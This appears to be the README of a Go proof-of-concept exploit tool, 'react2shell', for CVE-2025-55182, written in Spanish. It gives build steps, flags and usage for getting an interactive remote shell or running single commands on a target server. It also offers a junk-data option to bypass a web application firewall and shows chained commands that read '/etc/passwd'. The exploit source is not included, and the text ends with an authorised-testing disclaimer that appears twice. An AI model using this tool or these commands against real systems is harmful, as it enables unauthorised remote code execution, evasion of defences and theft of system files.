
PoC de react2shell con Go / CVE-2025-55182
CVE-2025-55182 PoC
# Shell interactivo
./react2shell -u http://target:3000
# Comando único
./react2shell -u http://target:3000 -c "id"
# Bypass de WAF (128KB de datos basura)
./react2shell -u http://target:3000 -waf 128
go build -o react2shell .
| Flag | Descripción |
|---|---|
-u | URL objetivo |
-c | Comando único (opcional) |
-waf | Tamaño de datos basura para el bypass de WAF en KB (opcional) |
; o && para encadenar comandos: cd /etc && cat passwdSolo para pruebas de seguridad autorizadas.
; o && para encadenar comandos: cd /etc && cat passwdSolo para pruebas de seguridad autorizadas.